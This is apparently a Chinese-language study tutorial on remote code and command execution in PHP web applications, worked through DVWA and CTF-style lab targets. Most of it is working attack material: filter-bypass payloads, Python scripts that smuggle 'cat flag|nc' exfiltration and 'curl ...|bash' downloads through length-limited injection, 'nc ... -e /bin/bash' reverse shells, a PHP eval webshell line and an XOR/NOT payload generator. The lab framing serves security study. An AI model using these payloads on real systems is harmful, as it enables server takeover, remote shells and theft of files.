漏洞原理#

RCE漏洞，通过不安全的api接口，可以让攻击者远程在系统平台中执行恶意命令和代码。

漏洞产生条件#

调用第三方组件存在的代码执行漏洞。
用户输入的内容作为系统命令的参数拼接到命令中。
对用户的输入过滤不严格。
可控变量或漏洞函数。

==RCE漏洞利用的两个前提条件：可控的参数，函数漏洞==

命令执行漏洞(Command Injection)#

原理#

该漏洞的出现是由于应用系统从设计上需要给用户提供指定的远程命令操作的接口，例如在防火墙的WEB界面中会存在一个故障排除功能，里面就会存在类似Ping操作的界面，若设计者未针对这类功能进行严格的控制检测，则可能导致攻击者提交恶意命令，从而控制后台，控制服务器。

命令执行危险函数#

1
PHP：system()、exec()、passthru()、shell()、shell_exec()、popen()、pcntl_exec()、proc_popen()、反引号等
2
python：eval exec subprocess os.system commands
3
Java：java.lang.runtime.Runtime.getRuntime、java.lang.runtime.Runtime.exec

系统命令执行函数#

system()：能将字符串作为OS命令执行，且返回命令执行结果；

exec()：能将字符串作为OS命令执行，但是只返回执行结果的最后一行(约等于无回显)；

shell_exec()：能将字符串作为OS命令执行，借用echo、print等输出结果

passthru()：能将字符串作为OS命令执行，只调用命令不返回任何结果，但把命令的运行结果原样输出到标准输出设备上；

popen()：打开进程文件指针，fgets获取内容->print_r输出内容

proc_open()：与popen()类似，也是无回显

pcntl_exec()：在当前进程空间执行指定程序；

反引号“：反引号“内的字符串会被解析为OS命令；

命令执行函数介绍#

system函数#

该函数会将执行的结果输出并将输出结果的最后一行作为字符串返回，如果执行失败则返回 fales。这个函数也是最常用的。

格式：system ( string $command [, int &$return_var ] )
作用：system函数执行给定的command命令，并将结果输出。第二个参数用于存储命令的返回状态，这是一个可选参数。
示例：

1
<?php
2
highlight_file(_FILE_);
3
system('pwd');
4
?>

exec函数#

该函数不会输出结果，但是会返回执行结果的最后一行，可以结合output进行结果的输出。

格式：exec ( string $command [, array &$output [, int &$return_var ]] )
作用：执行一个外部程序，exec()执行command参数所指定的命令。
示例

1
<?php
2
highlight_file(_FILE_);
3
exec('pwd',$b);
4
var_dump($b); //打印变量的信息
5
?>

passthru函数#

Passthru函数是PHP中的一个执行外部程序的函数，它能够将外部程序的标准输出直接传递给浏览器。该函数只调用命令，并将运行的结果原封不动的输出，没有相应的返回值。

格式：passthru($command);
示例：

1
<?php
2
highlight_file(_FILE_);
3
passthru('ls')
4
?>

shell_exec函数#

该函数不会输出结果，返回执行结果，使用反引号(“)时调用的就是此函数

1
<?php
2
highlight_file(_FILE_);
3
var_dump(shell_exec('ls'));
4
?>

命令执行基础#

windows基础命令#

windows的基础命令就是在cmd中输入的命令，类似 ping、ipconfig等

1
ping           //测试连通性
2
tracert        //追踪路由
3
telnet         //远程连接
4
dir            //列出目录
5
ipconfig       //查看ip
6
arp -a         //查看路由表
7
calc           //打开计算器
8
regedit        //打开注册表
9
netstat -ano   //查看服务器端口信息
10
whoami         //查看当前有效用户名
11
net user       //查看用户

linux基础命令#

平常使用的就是

1
cd                  //切换目录
2
ls                  //显示当前目录下的文件
3
ifconfig            //查看IP地址
4
cat /etc/passwd     //查看password文件内容
5
id                  //查看当前用户的id号
6
cat /etc/group      //查看用户组文件内容
7
pwd                 //显示当前目录
8
uname -a            //查看当前系统版本
9
natstat -pantu      //查看当前服务器的端口信息
10
netstat -nr         //查看网关和路由

命令连接符#

**windows和linux都支持的命令连接符：

cmd1 | cmd20 只执行cmd2 - cmd1 || cmd2 只有当cmd1执行失败后，cmd2才被执行
cmd1 & cmd2 先执行cmd1,不管是否成功，都会执行cmd2
cmd1 && cmd2 先执行cmd1，cmd1执行成功后才执行cmd2，否则不执行cmd2 linux还支持分号
cmd1 ; cmd2 按顺序依次执行，先执行cmd1再执行cmd2

示例/dvwa#

low级别#

这里我们使用whoami查看用户，但是如果在这里直接输入whoami，命令没有被执行。这时候我们就可以使用命令连接符
800
当我们在此处使用| whoami命令连接符时，命令被执行。使用|只会执行后面的。
800

Medium级别#

这里对&&进行了过滤，使用其他连接符即可

high级别#

这里就对|和&都进行了过滤，不过把|后面的空格去掉就行了|whoami，应该只地对单独的连接符进行了过滤。后面看成是一个整体了。

代码执行漏洞(Code execution)#

原理#

由于应用程序在调用一些能够将字符串转换为代码的函数（如PHP中的eval）时，没有考虑用户是否控制这个字符串，则会导致代码执行漏洞的发生

漏洞危害#

控制受害者的系统：攻击者可以利用漏洞控制受害者的系统，并对其进行各种恶意操作，如上传、下载、删除、修改文件等，甚至可以利用该漏洞构建僵尸网络、挖掘加密货币等。
窃取敏感信息：攻击者可以通过该漏洞窃取受害者系统中的敏感信息，如账号、密码、财务信息等。
进行后门植入：攻击者可以利用漏洞在系统中植入后门，以便在未来任何时间进行下一步的攻击。

代码执行函数介绍#

代码执行函数#

eval()：将字符串作为php代码执行；

assert()：将字符串作为php代码执行；

preg_replace()：正则匹配替换字符串；

create_function()：主要创建匿名函数；

call_user_func()：回调函数，第一个参数为函数名，第二个参数为函数的参数；

call_user_func_array()：回调函数，第一个参数为函数名，第二个参数为函数参数的数组；

可变函数：若变量后有括号，该变量会被当做函数名为变量值(前提是该变量值是存在的函数名)的函数执行；

${}执行代码#

该执行代码会将中间的PHP代码进行解析

1
<?php
2
${<?-- -->phpinfo()>};
3
?>

eval函数#

该函数会将字符串当作函数进行执行，但是需要传入一个完整的语句，并且必须以;分号为结尾，也是最常见的函数

1
<?php
2
eval('echo "hello world";');
3
?>
4

5
//恶意代码示例
6
//<?php eval($_POST['a']);?>

assert函数#

该函数是判断是否为字符串，如果是则当成代码执行。在php7.0.29之后的版本不支持动态调用

与eval稍有不同的是，传入的PHP代码不需要以分号结尾。

1
//低版本
2
<?php
3
assert($_POST['a'])
4
?>;
5
//7.0.29之后
6
<?php
7
$a = 'assert';
8
$a(phpinfo());
9
?>

array_map函数#

该函数是为数组的每个元素应用回调函数

1
<?php
2
highlight_file(__FILE__);
3
$a = $_GET['a'];
4
$b = $_GET['b'];
5
$array[0] = $b;
6
$c = array_map($a,$array);
7
?>
8
构建的payload
9
?a=assert&b=phpinfo();

preg_replace#

用来执行一个正则表达式的搜索和替换。执行代码需要使用==/e== 修饰符。前提是不超过PHP7

1
<?php
2
echo(preg_replace("/test/",$_POST['a'],"just test"));
3
?>

call_user_func#

回调函数，可以使用is_callable查看是否可以进行调用

1
<?php
2
call_user_func("assert",$_POST['a']);
3
?>

call_user_func_array#

回调函数，参数为数组格式：call_user_func_array ( callable $callback , array $param_arr ) 第一个参数作为回调函数（callback）调用
把参数数组作（param_arr）为回调函数的的参数传入

1
<?php
2
highlight_file(__FILE__);
3
$array[0] = $_POST['a'];
4
call_user_func_array("assert",$array);
5
?>

create_function#

用来创建匿名函数格式：create_function(string $args,string $code)

args是要创建的函数的参数
code是函数内的代码

1
<?php
2
error_reporting(0);
3
$sort_by = $_GET['sort_by'];
4
$sorter = 'strnatcasecmp';
5
$databases=array('1234','4321');
6
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
7
usort($databases, create_function('$a, $b', $sort_function));
8
?>

payload

1
?sort_by="]);}phpinfo();/*

示例#

eval函数示例#

看到此页面，直接在框框里输入phpinfo();试一下，后面要跟分号。看到代码被执行。

assert函数示例#

与eval类似，不过分号可以省略。也是直接在框框里输入phpinfo()。代码被执行。

call_user_func函数示例#

看到这个页面就知道与上面两个有所区别，这里有两个可控参数，第一个是被调用函数。第二则是被调用函数的参数。我们在第一个框里输入system，第二则是ls，可以看到代码成功执行。

RCE绕过#

管道符#

管道符	写法	描述	实例
;	A;B	无论真假，A与B都执行	ls;id
&	A&B	无论真假，A与B都执行	ls&id
&&	A&&B	A为真时才执行B，否则只执行A	ls&&id
\|	A\|B	将A的结果作为B的参数，显示B的结果	ls\|id
\|\|	A\|\|B	A为假时才执行B，否则只执行A	ls\|id

空格过滤#

以下可代替空格
<	<>	%20(即space)
%09(即tab)	$IFS$ 9	${IFS}
$IFS	{cat,/flag}

关键字过滤#

通配符绕过#

?、* ? 在linux里面可以进行代替字母。?仅代表单个字符串，但此单字必须存在

1
# 假如flag被过滤
2
cat fl?g.php
3
cat ????.???

* 在linux里面可以进行模糊匹配。*可以代表任何字符串

1
# 假如flag被过滤
2
cat f*

单引号过滤#

1
# 假如tac和flag被过滤
2
t""ac fl""ag.p""hp
3
ta''c fl''ag.p''hp"

反斜杆\绕过#

把特殊字符去功能性，单纯表示为字符串。在linux中是命令连接符

1
# 过滤flag
2
tac fl\ag.p\hp
3

4
# 过滤tac
5
t\ac flag.php

特殊变量#

特殊变量：$1 到 $9 、$@ 和 $* 等

1
# 过滤flag
2
cat fl$1ag.p$2hp
3

4
# 过滤cat
5
c$@at flag.php

内联执行#

自定义字符串，再拼接起来

1
# 过滤flag
2
a=f;b=la;c=g.p;d=hp;tac $a$b$c$d
3

4
a=f;b=la;c=g.t;d=xt;e=c;f=at;$e$f $a$b$c$d

cat替换#

tac	与cat相反，按行反向输出	tac flag.php
more	按页显示，用于文件内容较多且不能滚动屏幕时查看文件	more flag.php
less	与more类似	less flag.php
tail	查看文件末几行	tail flag.php
head	查看文件首几行	head flag.php
nl	在cat查看文件的基础上显示行号	nl flag.php
od	以二进制方式读文件，od -A d -c /flag转人可读字符	od flag.php od -A d -c flag.php
xxd	以二进制方式读文件，同时有可读字符显示	xxd flag.php
sort	排序文件	sort flag.php
uniq	报告或删除文件的重复行	uniq flag.php
file -f	报错文件内容	file -f flag.php
grep	过滤查找字符串，grep flag /flag	grep fl fla*
dd	读磁盘的信息，顺便给了目录信息	dd if=flag.php

编码绕过#

base64编码

1
# Y2F0IGZsYWcucGhw为cat flag.php。bash可以使用sh、/bin/bash替换
2
echo Y2F0IGZsYWcucGhw | base64 -d | bash
3

4
`echo Y2F0IGZsYWcucGhw | base64 -d`
5
$(echo Y2F0IGZsYWcucGhw | base64 -d)

base32编码

1
# 编码为cat flag.php
2
echo MNQXIIDGNRQWOLTQNBYA==== | base64 -d | bash

HEX编码

1
# 编码为cat flag.php
2
echo 63617420666c61672e706870 |xxd -r -p |bash

shellcode编码

1
# 编码为tac flag.php
2
printf "\x74\x61\x63\x20\x66\x6c\x61\x67\x2e\x70\x68\x70"|bash

无回显RCE#

sleep	5秒后返回结果	sleep 5
awk NR	逐行获取数据	cat flag.php \| awk NR==1
cut -c	逐列获取单个字符	cat flag.php \| awk NR==1 \|cut -c 1
if	判断命令是否执行	if [ 2 > 1 ];then echo “right”;fi
payload

绕过长度限制#

绕过长度7#

通过创建文件名，和结合ls -t写进文件执行命令 >创建很短的文件名 ls -t按时间顺序列出文件名，按行储存 \连接换行命令 sh从文件中读取命令假如要执行命令是

1
cat flag|nc 172.25.19.202 7777
2

3
>7777
4
>\ \\
5
>202\\
6
>19.\\
7
>25.\\
8
>172.\\
9
>c\ \\
10
>\|n\\
11
>flag\\
12
>t\ \\
13
>ca\\

此时服务器有这么些文件

再通过ls -t把得到的结果写进a里面

1
ls -t>a

最后再执行文件a

1
sh a

成功得到flag

脚本

1
#encoding:utf-8
2
import time
3
import requests
4
baseurl = "http://192.168.1.6:19080/class09/2/index.php?cmd="
5
s = requests.session()
6

7
list=[
8
    '>7777',
9
    '>1\%20\\',
10
    '>16\\',
11
    '>1.\\',
12
    '>168.\\',
13
    '>2.\\',
14
    '>19\\',
15
    '>c\%20\\',
16
    '>\|n\\',
17
    '>ag\\',
18
    '>fl\\',
19
    '>t\ \\',
20
    '>ca\\',
21
    'ls -t>a'
22
]
23

24
for i in list:
25
    time.sleep(1)
26
    url = baseurl+str(i)
27
    s.get(url)
28

29
s.get(baseurl+"sh a")

绕过长度5#

通过远程下载文件执行命令，在要下载的文件写上命令（反弹shell）步骤一：构造ls -t>y

1
>ls\\
2
ls>_
3
>\ \\
4
>-t\\
5
>\>y
6
ls>>_

步骤二：分解命令，创建文件要执行的命令

1
curl 172.25.19.202|bash
2

3
>bash
4
>\|\\
5
>02\\
6
>.2\\
7
>19\\
8
>5.\\
9
>2\\
10
>2.\\
11
>17\\
12
>rl\\
13
>cu\\

步骤三：执行脚本sh

1
sh _
2
sh y

准备工作

开启监听端口
创建index.html文件

1
nc 172.25.19.202 7777 -e /bin/bash

开启服务脚本

1
#encoding:utf-8
2
import time
3
import requests
4
baseurl = "http://192.168.1.6:19080/class09/3/index.php?cmd="
5
s = requests.session()
6

7
# 将ls -t 写入文件_
8
list=[
9
    ">ls\\",
10
    "ls>_",
11
    ">\ \\",
12
    ">-t\\",
13
    ">\>y",
14
    "ls>>_"
15
]
16

17
# curl 192.168.1.161/1|bash
18
list2=[
19
    ">bash",
20
    ">\|\\",
21
    ">\/\\",
22
    ">61\\",
23
    ">1\\",
24
    ">1.\\",
25
    ">8.\\",
26
    ">16\\",
27
    ">2.\\",
28
    ">19\\",
29
    ">\ \\",
30
    ">rl\\",
31
    ">cu\\"
32
]
33
for i in list:
34
    time.sleep(1)
35
    url = baseurl+str(i)
36
    s.get(url)
37

38
for j in list2:
39
    time.sleep(1)
40
    url = baseurl+str(j)
41
    s.get(url)
42

43
s.get(baseurl+"sh _")
44
s.get(baseurl+"sh y")

绕过长度4#

前置知识： dir：按列输出文件名，不换行。 *：相当于$(dir *) *如果第一个文件是命令的话就会执行命令，返回执行的结果，之后的文件名作为参数传入 rev：可以反转文件每一行的内容。

步骤一：构造ls -t>g

1
# 避免原有的文件影响命令执行
2
>g\;
3

4
>g\>
5
>ht-
6
>sl
7
>dir
8

9
*>v
10

11
# 倒序排列
12
>rev
13
*v>x

步骤二：构造一个反弹shell

1
curl 192.168.220.20|bash
2
# 上面不行，要使用16进制
3
curl 0xc0a8dc14|bash
4

5
>ash
6
>b\
7
>\|\
8
>14\
9
>dc\
10
>a8\
11
>c0\
12
>0x\
13
>\ \
14
>rl\
15
>cu\
16

17
sh x
18
sh g

步骤三：反弹回来的shell查看flag

准备工作

开启监听端口
Terminal window
```
1
nc -lvvp 7777
```
创建index.html文件。目标靶机curl下载index.html，交给bash执行，反弹shell
Terminal window
```
1
nc 192.168.220.20 7777 -e /bin/bash
```
开启http.server 监听80端口
```
1
python -m http.server 80
```
执行脚本脚本

1
#encoding:utf-8
2
import time
3
import requests
4
baseurl = "http://192.168.20.129:18088/class09/4/ffff.php?cmd="
5
s = requests.session()
6

7
# 将ls -t 写入文件g
8
list=[
9
    ">g\;",
10
    ">g\>",
11
    ">ht-",
12
    ">sl",
13
    ">dir",
14
    "*>v",
15
    ">rev",
16
    "*v>x"
17
]
18

19
# curl 192.168.1.161|bash
20
list2= [
21
    ">ash",
22
    ">b\\",
23
    '>\|\\',
24
    '>14\\',
25
    '>dc\\',
26
    '>a8\\',
27
    '>C0\\',
28
    '>0x\\',
29
    '>\ \\',
30
    '>rl\\',
31
    '>cu\\'
32
]
33
for i in list:
34
    time.sleep(1)
35
    url = baseurl+str(i)
36
    s.get(url)
37

38
for j in list2:
39
    time.sleep(1)
40
    url = baseurl+str(j)
41
    s.get(url)
42

43
s.get(baseurl+"sh x")
44
s.get(baseurl+"sh g")

无参数RCE#

http请求标头#

通过 getallheaders()：获取所有HTTP请求标头然后通过end或者pos去取值

1
# pos()把第一项的值显示出来
2
?code=print_r(pos(getallheaders()));
3

4
# end()把最后一项的值显示出来
5
?code=print_r(end(getallheaders()));

apache_request_headers()：功能与getallheaders()相似、适用于apache服务器

利用全局变量RCE(php5/7)#

get_defined_vars()：返回所有已定义变量的值，所组成的数组

1
?code=eval(end(pos(get_defined_vars())));&cmd=system('ls');

利用session#

session_start：启动新会话或者重用现有会话，成功开始会话返回True，反之返回flase。

1
?code=show_source(session_id(session_start()));

然后修改PHPSESSID的值为./flag，再使用show_source读取flag文件源代码。

如果要执行命令，需要把要执行的命令通过hex编码转十六进制，写入PHPSESSID

1
?code=eval(hex2bin(session_id(session_start())));

scandir读取#

scandir()：类似ls，在某文件路径下，把内容以列表形式显示出来

1
scandir() — 列出指定路径中的文件和目录(PHP 5, PHP 7, PHP 8)
2
getcwd() — 取得当前工作目录(PHP 4, PHP 5, PHP 7, PHP 8)
3
current() — 返回数组中的当前值(PHP 4, PHP 5, PHP 7, PHP 8)
4
array_reverse() — 返回单元顺序相反的数组(PHP 4, PHP 5, PHP 7, PHP 8)
5
array_flip() — 交换数组中的键和值(PHP 4, PHP 5, PHP 7, PHP 8)
6
next() — 将数组中的内部指针向前移动(PHP 4, PHP 5, PHP 7, PHP 8)
7
array_rand — 从数组中随机取出一个或多个随机键
8
chdir() — 系统调用函数（同cd），用于改变当前工作目录
9
strrev() — 用于反转给定的字符串
10
crypt() —用来来加密，目前Linux平台上加密的方法大致有MD5, DES, 3 DES
11
hebrevc() — 把希伯来文本从右至左的流转换为左至右的流。
12
localeconv() — 获取当前地域的数字和货币格式信息。显示的数组第一项为"."
13
show_source() — 对文件进行语法高亮显示
14
highlight_file() — 对文件内容进行 PHP 语法高亮显示
15
dirname() — 返回路径中的目录部分  上一级目录

例题

1
<?php
2
error_reporting(0);
3
highlight_file(__FILE__);
4
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {
5
    eval($_GET['code']);
6
}
7
?>

payload：

1
highlight_file(current(array_reverse(scandir(current(localeconv())))));

根目录

1
# 此时通过crypt随机加密可能可以得到"\",不过\在最后面，可以通过strrev反转字符串
2
print_r(strrev(crypt(serialize(array()))));

ord() 函数和chr() 函数只能对第一个字符进行转码 ord()编码，chr()解码

1
print_r(chr(ord(strrev(crypt(serialize(array()))))));

最终payload

1
highlight_file(array_rand(array_flip(scandir(dirname(chdir(chr(ord(strrev(crypt(serialize(array())))))))))));

无字母数字RCE#

异或绕过#

脚本

1
# 异或构造Python脚本
2
valid = "1234567890!@$%^*(){}[];\'\",.<>/?-=_`~ "
3

4
answer = input('输入异或构造的字符串:')
5

6
tmp1, tmp2 = '', ''
7
for c in answer:
8
    for i in valid:
9
        for j in valid:
10
            if ord(i) ^ ord(j) == ord(c):
11
                tmp1 += i
12
                tmp2 += j
13
                break
14
        else:
15
            continue
16
        break
17

18
print(f'"{tmp1}"^"{tmp2}"')

1
def generate_xor_payload(target_str):
2
    """    将目标字符串转换为PHP异或表达式    格式: "A"^"B" 其中A和B仅包含非字母数字字符    """# 定义安全字符集（非字母数字的可见ASCII字符）
3
    safe_chars = [c for c in range(32, 127)
4
                  if not (48 <= c <= 57 or 65 <= c <= 90 or 97 <= c <= 122)]
5

6
    # 移除双引号(34)避免冲突，保留反斜杠(92)但需要转义
7
    safe_chars = [c for c in safe_chars if c != 34]
8

9
    left_parts = []
10
    right_parts = []
11

12
    for char in target_str:
13
        target_code = ord(char)
14
        found = False
15

16
        # 尝试查找合适的字符对
17
        for a in safe_chars:
18
            b = a ^ target_code
19
            if b in safe_chars:
20
                left_parts.append(chr(a))
21
                right_parts.append(chr(b))
22
                found = True
23
                break
24

25
        if not found:
26
            # 尝试使用两次异或（如果需要）
27
            for a in safe_chars:
28
                for c in safe_chars:
29
                    b = a ^ target_code ^ c
30
                    if b in safe_chars:
31
                        left_parts.append(chr(a))
32
                        right_parts.append(chr(b))
33
                        found = True
34
                        break
35
                if found:
36
                    break
37

38
        if not found:
39
            raise ValueError(f"无法为字符 '{char}' (ASCII {target_code}) 找到合适的异或对")
40

41
    # 构建PHP字符串，处理反斜杠转义
42
    left_str = ''.join(left_parts).replace('\\', '\\\\')
43
    right_str = ''.join(right_parts).replace('\\', '\\\\')
44

45
    return f'"{left_str}"^"{right_str}"'
46

47

48
def generate_full_payload(command):
49
    """    生成完整的PHP payload    格式: $_ = [函数异或]; $__ = [参数异或]; $_($__);    """# 分解命令为函数和参数
50
    if '(' in command and ')' in command:
51
        func = command.split('(')[0]
52
        args = command.split('(')[1].rstrip(')')
53
    else:
54
        func = command
55
        args = ""
56

57
    try:
58
        func_payload = generate_xor_payload(func)
59
        args_payload = generate_xor_payload(args)
60

61
        php_code = f'$_ = {func_payload};'
62

63
        if args:
64
            php_code += f'$__ = {args_payload};'
65
            php_code += '$_($__);'
66
        else:
67
            php_code += '$_();'
68

69
        return php_code
70

71
    except ValueError as e:
72
        return f"生成失败: {e}"
73

74

75
def main():
76
    print("PHP非字母数字异或Payload生成器")
77
    print("=" * 50)
78

79
    while True:
80
        try:
81
            command = input("\n请输入要执行的命令 (例如 system('ls'), system('cat /flag')): ").strip()
82
            if not command:
83
                print("输入不能为空，请重新输入")
84
                continue
85

86
            payload = generate_full_payload(command)
87

88
            print("\n生成的PHP代码:")
89
            print(payload)
90

91
            # URL编码
92
            from urllib.parse import quote
93
            url_encoded = quote(payload)
94
            print("\nURL编码结果:")
95
            print(url_encoded)
96

97
            print("\n" + "=" * 50)
98

99
        except KeyboardInterrupt:
100
            print("\n\n已退出")
101
            break
102

103

104
if __name__ == "__main__":
105
    main()

实例：

1
# phpinfo
2
?cmd=$_="+(+).&/"^"[@[@@@@";$_();
3
# 进行url编码
4
?cmd=%24_%3D%22%2B(%2B).%26%2F%22%5E%22%5B%40%5B%40%40%40%40%22%3B%24_()%3B

php5

1
# assert($_POST['_']);
2

3
<?php
4
$a = 'assert';
5
$b = '_POST';
6
$c = $$b;        // $c = $_POST
7
$a($c['_']);    // assert($_POST['_']);
8
?>
9

10
# 替换成
11
<?php
12
$_ = "!((%)("^")@[[@[\\";
13
$__ = "!+/(("^")~{`{|";
14
$___ = $$__;
15
$_($___['_']);
16
?>
17

18

19
# 最终payload
20
?cmd=$_="!((%)("^"@[[@[\\";$__="!+/(("^"~{`{|";$___=$$__;$_($___['_']);
21

22
# 然后post提交_=system('ls');

php7

1
# `$_POST[_]`;
2

3
<?php
4
$_ = '_POST';
5
$__ = $$_;
6
`$__[_]`;
7
?>
8

9
# 最终payload
10
?cmd=$_="!+/(("^"~{`{|";$__=$$_;`$__[_]`;
11

12
# 然后post提交_=nc 172.25.19.202 7777 -e /bin/bash;

取反绕过#

php7 脚本

1
<?php
2
$a = "system";
3
$b = "cat /flag";
4

5
$c = urlencode(~$a);
6
$d = urlencode(~$b);
7

8
//输出得到取反传参内容
9
echo "?cmd=(~".$c.")(~".$d.");"
10
?>

php5 assert 取反url编码：%9e%8c%8c%9a%8d%8b

1
<?php
2
$_=~("%9e%8c%8c%9a%8d%8b");
3
$__=~("%A0%AF%B0%AC%AB");
4
$___=$$__;
5
$_($___[_]);
6
?
7

8
# 最终payload，不需要再URL编码
9
?cmd=$_=~("%9e%8c%8c%9a%8d%8b");$__=~("%A0%AF%B0%AC%AB");$___=$$__;$_($___[_]);
10

11
#post提交
12
_=system('ls');

自增绕过#